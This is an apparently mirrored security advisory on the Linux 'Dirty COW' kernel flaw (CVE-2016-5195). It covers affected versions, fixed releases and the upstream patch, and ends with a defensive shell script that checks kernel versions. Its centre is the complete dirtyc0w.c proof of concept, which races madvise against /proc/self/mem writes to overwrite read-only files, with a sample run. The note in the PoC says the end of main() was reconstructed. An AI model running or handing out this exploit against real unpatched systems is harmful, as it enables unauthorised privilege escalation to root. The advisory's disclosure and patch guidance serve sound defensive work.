Vulnerability early warning: the 9-year-old "Dirty COW" 0day vulnerability in the Linux kernel - vulnerability warning - the black bar safety net

2016-10-21T00:00:00
ID MYHACK58:62201680419
Type myhack58
Reporter Anonymous
Modified 2016-10-21T00:00:00

Description

The vulnerability, nicknamed Dirty COW ("dirty copy-on-write"), has existed in the Linux kernel for 9 years: it is already present in kernel versions released in 2007. The Linux kernel team has now fixed it.

Vulnerability ID: CVE-2016-5195
Vulnerability name: Dirty COW
Vulnerability impact: a low-privileged local user can exploit it to escalate privileges on many Linux systems
Affected range: Linux kernel >= 2.6.22 (released in 2007); fixed only on October 18, 2016
Vulnerability overview: the Linux kernel's memory subsystem has a race condition in the way it handles copy-on-write (COW) breakage of private read-only memory mappings. A malicious user can exploit it to gain write access to a read-only memory mapping and so elevate privileges. (Red Hat's description: "A race condition was found in the way the Linux kernel's memory subsystem handled the copy-on-write (COW) breakage of private read-only memory mappings.") A race condition is a situation in which an abnormal ordering of concurrently running tasks can crash the application or be exploited by an attacker to execute other code. Using this vulnerability, an attacker can elevate privileges on the target system, possibly all the way to root. According to the officially released patch information, the problem goes back to Linux kernel versions published in 2007. There is currently no evidence that hackers exploited it in the years since 2007; however, security expert Phil Oester discovered an attacker using the vulnerability in a live attack and reported the recent attacks to Red Hat.
Repair method: Linux kernel maintainer Greg Kroah-Hartman announced maintenance updates for the Linux 4.8, 4.7 and 4.4 LTS kernel series; the updated releases, Linux kernel 4.8.3, 4.7.9 and 4.4.26 LTS, fix the vulnerability.
The new versions have already landed in the package repositories of the various GNU/Linux distributions, including Arch Linux testing, Solus and all supported versions of Ubuntu. Debian developers also announced, the day before yesterday, an important kernel update for the stable Debian GNU/Linux 8 "Jessie" series; that update fixes 4 Linux kernel security vulnerabilities in total, including Dirty COW. Every operating system vendor should immediately pick up Linux kernel 4.8.3, Linux kernel 4.7.9 and Linux kernel 4.4.26 LTS and push them to users through the stable update channel. Developers who build their own kernel can apply the upstream commit https://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=19be0eaffa3ac7d8eb6784ad9bdbc7d67ed8e619 and recompile Linux to fix the vulnerability. Note that distribution kernels usually carry this fix as a backport without changing the upstream version number, so check the distribution's security advisory or package changelog rather than the version string alone.

Vulnerability PoC (dirtyc0w.c):

/*

####################### dirtyc0w.c #######################
$ sudo -s
# echo this is not a test > foo
# chmod 0404 foo
$ ls -lah foo
-r-----r-- 1 root root 19 Oct 20 15:23 foo
$ cat foo
this is not a test
$ gcc -lpthread dirtyc0w.c -o dirtyc0w
$ ./dirtyc0w foo m00000000000000000
mmap 56123000
madvise 0
procselfmem 1800000000
$ cat foo
m00000000000000000
####################### dirtyc0w.c #######################
*/
#include <stdio.h>
#include <string.h>
#include <stdint.h>
#include <fcntl.h>
#include <unistd.h>
#include <pthread.h>
#include <sys/mman.h>
#include <sys/stat.h>

void *map;
int f;
struct stat st;
char *name;

/* Thread 1: keep throwing away the private COW copy of the page so the kernel
   has to fault it in again while the other thread is writing. */
void *madviseThread(void *arg)
{
  char *str;
  str = (char *)arg;
  (void)str;
  int i, c = 0;
  for (i = 0; i < 100000000; i++)
  {
    /*
    You have to race madvise(MADV_DONTNEED) :: https://access.redhat.com/security/vulnerabilities/2706661
    > This is achieved by racing the madvise(MADV_DONTNEED) system call
    > while having the page of the executable mmapped in memory.
    */
    c += madvise(map, 100, MADV_DONTNEED);
  }
  printf("madvise %d\n\n", c);
  return NULL;
}

/* Thread 2: write the new contents through /proc/self/mem at the address of
   the read-only private mapping. */
void *procselfmemThread(void *arg)
{
  char *str;
  str = (char *)arg;
  /*
  You have to write to /proc/self/mem :: https://bugzilla.redhat.com/show_bug.cgi?id=1384344#c16
  > The in the wild exploit we are aware of doesn't work on Red Hat
  > Enterprise Linux 5 and 6 out of the box because on one side of
  > the race it writes to /proc/self/mem, but /proc/self/mem is not
  > writable on Red Hat Enterprise Linux 5 and 6.
  */
  int f = open("/proc/self/mem", O_RDWR);
  int i, c = 0;
  for (i = 0; i < 100000000; i++) {
    /*
    You have to reset the file pointer to the memory position.
    */
    lseek(f, (uintptr_t)map, SEEK_SET);
    c += write(f, str, strlen(str));
  }
  printf("procselfmem %d\n\n", c);
  return NULL;
}

int main(int argc, char *argv[])
{
  /*
  You have to pass two arguments. File and Contents.
  */
  if (argc < 3) {
    fprintf(stderr, "usage: %s target_file new_content\n", argv[0]);
    return 1;
  }
  pthread_t pth1, pth2;
  /*
  You have to open the file in read only mode.
  */
  f = open(argv[1], O_RDONLY);
  fstat(f, &st);
  name = argv[1];
  /*
  You have to use MAP_PRIVATE for copy-on-write mapping.
  > Create a private copy-on-write mapping.  Updates to the
  > mapping are not visible to other processes mapping the same
  > file, and are not carried through to the underlying file.  It
  > is unspecified whether changes made to the file after the
  > mmap() call are visible in the mapped region.
  */
  /*
  You have to open with PROT_READ.
  */
  map = mmap(NULL, st.st_size, PROT_READ, MAP_PRIVATE, f, 0);
  /*
  The original page is cut off after the mmap() call ("[1] [2] next"). The
  lines below print the mapping address shown in the transcript above, then
  start the two threads declared as pth1/pth2 and wait for them; they follow
  from those declarations and the two thread functions, nothing else.
  */
  printf("mmap %lx\n\n", (unsigned long)map);
  pthread_create(&pth1, NULL, madviseThread, argv[1]);
  pthread_create(&pth2, NULL, procselfmemThread, argv[2]);
  pthread_join(pth1, NULL);
  pthread_join(pth2, NULL);
  return 0;
}
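As an added check (example code written for this page, not part of the original advisory or the PoC): a small POSIX sh helper that compares a kernel version string, in the form `uname -r` prints it, against the first fixed releases the advisory names, 4.8.3, 4.7.9 and 4.4.26. The function names, the three verdict strings and the sample version strings are my own. The verdict `unlisted` covers series the advisory does not mention (3.x, 4.1 and so on); and because distribution kernels ship the fix as a backport without changing the upstream version number, `older-than-fix` means "consult the distribution's advisory or package changelog", not "exploitable".

```sh
#!/bin/sh
# Added example, not from the original advisory: compare a kernel version
# string with the first fixed stable releases named in the text
# (4.8.3, 4.7.9, 4.4.26 for CVE-2016-5195).
# Caveat: distributions backport the fix without bumping the upstream
# version, so "older-than-fix" means "check the distro advisory", not
# "exploitable". Function and variable names here are my own.

# Print the n-th dot-separated field of $1 (empty if it does not exist).
field() {
    printf '%s\n' "$1" | awk -F. -v n="$2" '{ print $n }'
}

# Compare two dotted numeric versions; print -1, 0 or 1.
# A missing trailing field counts as 0, so 4.8 compares below 4.8.3.
vercmp() {
    i=1
    while [ "$i" -le 8 ]; do
        x=$(field "$1" "$i")
        y=$(field "$2" "$i")
        if [ -z "$x" ] && [ -z "$y" ]; then printf '%s\n' 0; return 0; fi
        x=${x:-0}
        y=${y:-0}
        if [ "$x" -lt "$y" ]; then printf '%s\n' -1; return 0; fi
        if [ "$x" -gt "$y" ]; then printf '%s\n' 1; return 0; fi
        i=$((i + 1))
    done
    printf '%s\n' 0
}

# Classify a `uname -r` style string: fixed | older-than-fix | unlisted.
dirtycow_fix_status() {
    # Keep only the leading numeric part: 4.4.0-45-generic -> 4.4.0
    v=$(printf '%s\n' "$1" | sed 's/[^0-9.].*//')
    series="$(field "$v" 1).$(field "$v" 2)"
    case "$series" in
        4.4) fix=4.4.26 ;;
        4.7) fix=4.7.9 ;;
        *)   fix=4.8.3 ;;   # 4.8 itself and every later mainline release
    esac
    if [ "$(vercmp "$v" "$fix")" -ge 0 ]; then
        printf '%s\n' fixed
    elif [ "$series" = 4.4 ] || [ "$series" = 4.7 ] || [ "$series" = 4.8 ]; then
        printf '%s\n' older-than-fix
    else
        printf '%s\n' unlisted
    fi
}

# Report on the kernel this shell is running on.
report_running_kernel() {
    kv=$(uname -r)
    printf '%s: %s\n' "$kv" "$(dirtycow_fix_status "$kv")"
}
```

Source the file and call `report_running_kernel`, or pass a version string straight to `dirtycow_fix_status` when triaging an inventory export; a `4.4.0-45-generic` style string classifies as `older-than-fix` because the upstream part is 4.4.0, which is exactly the case where the distribution's own advisory, not this comparison, decides.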
